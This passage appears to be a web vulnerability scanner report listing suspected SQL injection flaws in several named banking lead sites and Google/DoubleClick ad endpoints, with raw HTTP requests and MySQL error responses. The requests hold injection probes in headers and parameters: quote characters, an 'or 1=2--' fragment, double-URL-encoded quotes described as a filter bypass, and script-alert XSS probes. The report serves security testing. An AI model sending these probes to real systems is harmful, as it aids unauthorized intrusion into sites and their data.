Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:05:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7547

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write('\r\n');

function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/2656415/5-ally-no_fear-300x250.swf";
var gif = "http://s0.2mdn.net/2656415/ally-no_fear-300x250.jpg";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/1e6/%2a/r%3B233905705%3B1-0%3B0%3B57865904%3B4307-300/250%3B40155598/40173385/4%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw59241290'%20or%201%3d2--%20&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865904%3B40155598");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();

var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/1e6/%2a/r%3B233905705%3B1-0%3B0%3B57865904%3B4307-300/250%3B40155598/40173385/4%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw59241290'%20or%201%3
...[SNIP]...

1.5. http://getcheckingaccountonline.com/ [Referer HTTP header] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://getcheckingaccountonline.com
Path:	/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /?keyword=online%20banking&adid=289819058&b820e HTTP/1.1
Host: getcheckingaccountonline.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q='
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:12:53 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=dc307655d77e4efc9a7460f7ba1a6b97; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 20920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content
...[SNIP]...
</html>

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '289819058','','b5a38b357dfdbc3b01a714be61fcdd22','')' at line 1

Request 2

GET /?keyword=online%20banking&adid=289819058&b820e HTTP/1.1
Host: getcheckingaccountonline.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=''
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:12:54 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=ebe832e560498f40160ad2370c3996b7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 20744

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content
...[SNIP]...

1.6. http://getcheckingaccountonline.com/ [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://getcheckingaccountonline.com
Path:	/

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /?keyword=online%20banking&adid=289819058&b820e HTTP/1.1
Host: getcheckingaccountonline.com
Proxy-Connection: keep-alive
Referer: http://onlinecheckingsbanking.com/?keyword=online%20banking&adid=289819058&b820e%22%3E%3Cscript%3Ealert(1)%3C/script%3E6f57152ba82=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10'
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:12:50 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=fc415f418e69722c72a2807eb71ca4c5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 22598

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content
...[SNIP]...
</html>

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://onlinecheckingsbanking.com/?keyword=online%20banking&adid=289819058&b820e' at line 1

Request 2

GET /?keyword=online%20banking&adid=289819058&b820e HTTP/1.1
Host: getcheckingaccountonline.com
Proxy-Connection: keep-alive
Referer: http://onlinecheckingsbanking.com/?keyword=online%20banking&adid=289819058&b820e%22%3E%3Cscript%3Ealert(1)%3C/script%3E6f57152ba82=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10''
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:12:52 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=7dd1a6a8ba7bfea10bda2638dee3989b; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 22361

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content
...[SNIP]...

1.7. http://getcheckingaccountonline.com/click.php [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://getcheckingaccountonline.com
Path:	/click.php

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /click.php HTTP/1.1
Host: getcheckingaccountonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close
Cookie: PHPSESSID=910fa7149be46e9b98f24fb29d9885de;

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:16:40 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 20079

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content
...[SNIP]...
</html>

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://www.google.com/search?hl=en&q=''','3b4a7','','413bf3cdfe3cde8f4a866c30946' at line 1

Request 2

GET /click.php HTTP/1.1
Host: getcheckingaccountonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close
Cookie: PHPSESSID=910fa7149be46e9b98f24fb29d9885de;

Response 2 (redirected)

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:16:41 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 19788

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content
...[SNIP]...

1.8. http://getcheckingaccountsonlines.info/ [Referer HTTP header] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://getcheckingaccountsonlines.info
Path:	/

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /?keyword=online%20banking&adid=289819058 HTTP/1.1
Host: getcheckingaccountsonlines.info
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q='
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:44:48 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=660e29f48d4aac3c385897d9d82a55c0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content
...[SNIP]...
</html>

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '289819058','','0244b6678e6b23c21518f5d26480ada3','')' at line 1

Request 2

GET /?keyword=online%20banking&adid=289819058 HTTP/1.1
Host: getcheckingaccountsonlines.info
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=''
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:44:49 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=e6332486a2ea5d91917c4c569982a5e7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 20797

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content
...[SNIP]...

1.9. http://getcheckingaccountsonlines.info/ [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://getcheckingaccountsonlines.info
Path:	/

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /?keyword=online%20banking&adid=289819058 HTTP/1.1
Host: getcheckingaccountsonlines.info
Proxy-Connection: keep-alive
Referer: http://onlinecheckingsbanking.com/?keyword=online%20banking&adid=289819058
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10'
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:44:46 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=e48e03d6d5fd1f7a70127fee49017607; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content
...[SNIP]...
</html>

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://onlinecheckingsbanking.com/?keyword=online%20banking&adid=289819058','289' at line 1

Request 2

GET /?keyword=online%20banking&adid=289819058 HTTP/1.1
Host: getcheckingaccountsonlines.info
Proxy-Connection: keep-alive
Referer: http://onlinecheckingsbanking.com/?keyword=online%20banking&adid=289819058
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10''
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:44:47 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=5acb8319ef07c175f163f237da865d26; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21421

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content
...[SNIP]...

1.10. http://getcheckingaccountsonlines.info/click.php [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://getcheckingaccountsonlines.info
Path:	/click.php

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /click.php HTTP/1.1
Host: getcheckingaccountsonlines.info
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close
Cookie: PHPSESSID=a788a8ec55f5bc1c8c6ea8ae0724f091;

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:45:39 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 20527

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content
...[SNIP]...
</html>

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://onlinecheckingsbanking.com/?keyword=online%20banking&adid=289819058','289' at line 1

Request 2

GET /click.php HTTP/1.1
Host: getcheckingaccountsonlines.info
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close
Cookie: PHPSESSID=a788a8ec55f5bc1c8c6ea8ae0724f091;

Response 2 (redirected)

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:45:40 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 20285

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content
...[SNIP]...

1.11. http://googleads.g.doubleclick.net/apps/domainpark/domainpark.cgi [ref parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://googleads.g.doubleclick.net
Path:	/apps/domainpark/domainpark.cgi

Issue detail

The ref parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ref parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ref request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /apps/domainpark/domainpark.cgi?callback=_google_json_callback&output=js&client=ca-dp-r-mark03_3ph_js&domain_name=peoplesbank.com&hl=en&channel=000017&s=peoplesbank.com&kw=Internet%2Bbanking9183b%253Cscript%253Ealert%25281%2529%253C%252Fscript%253E6fd4fa2c65b&dt=1296748025709&u_tz=-360&u_his=2&u_h=1200&u_w=1920&frm=0&ref=http%3A%2F%2Fburp%2Fshow%2F31%2527 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://peoplesbank.com/search.php?d=peoplesbank.com&cachekey=1296747318&rc=true&term=Internet+banking9183b%3Cscript%3Ealert(1)%3C/script%3E6fd4fa2c65b&append=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
Content-Type: application/javascript; charset=UTF-8
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
X-Content-Type-Options: nosniff
Date: Thu, 03 Feb 2011 15:53:36 GMT
Server: domainserver
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 18947

_google_json_callback(
{
"tm": 0.106907,
"output": "js",
"domain_name": "http://peoplesbank.com/",
"channel": "000017",
"client": "ca-dp-r-mark03_3ph_js",
"hl": "en",
"kw
...[SNIP]...
ontent%26ga_adgroup%3Dworst&client=ca-dp-r-mark03_3ph_js",
"visible_url": "www.MoneyAndMarkets.com",
"line1": "Is Your Bank In Trouble?",
"line2": "Free list Of Banks Doomed To Fail. The Banks and Brokers X List. Free!",

"type": "text/wide"
},
{
"n": 5,
"url": "http://googleads.g.doubleclick.net/aclk?sa=L&ai=BTda1f89KTb_xOa67sQeF6dnODv
...[SNIP]...

Request 2

GET /apps/domainpark/domainpark.cgi?callback=_google_json_callback&output=js&client=ca-dp-r-mark03_3ph_js&domain_name=peoplesbank.com&hl=en&channel=000017&s=peoplesbank.com&kw=Internet%2Bbanking9183b%253Cscript%253Ealert%25281%2529%253C%252Fscript%253E6fd4fa2c65b&dt=1296748025709&u_tz=-360&u_his=2&u_h=1200&u_w=1920&frm=0&ref=http%3A%2F%2Fburp%2Fshow%2F31%2527%2527 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://peoplesbank.com/search.php?d=peoplesbank.com&cachekey=1296747318&rc=true&term=Internet+banking9183b%3Cscript%3Ealert(1)%3C/script%3E6fd4fa2c65b&append=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 2

1.12. http://googleads.g.doubleclick.net/pagead/ads [num_ads parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The num_ads parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the num_ads parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the num_ads request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pagead/ads?client=ca-freedom_js&output=js&image_size=300x250&lmt=1296771806&num_ads=4%2527&channel=foci%2Cocregister%2Cblogs&ad_type=text%2Cimage&adtest=off&ea=0&oe=utf8&flash=10.1.103&hl=en&url=http%3A%2F%2Fmortgage.ocregister.com%2Ffeeda71cd%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E1f35e8c0ea2%2F&adsafe=high&dt=1296750718575&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296750719074&frm=0&adk=1151042365&ga_vid=721383.1296750720&ga_sid=1296750720&ga_hid=467942346&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1021&bih=1012&ref=http%3A%2F%2Fburp%2Fshow%2F49&fu=0&ifi=1&dtd=937 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 03 Feb 2011 18:57:09 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
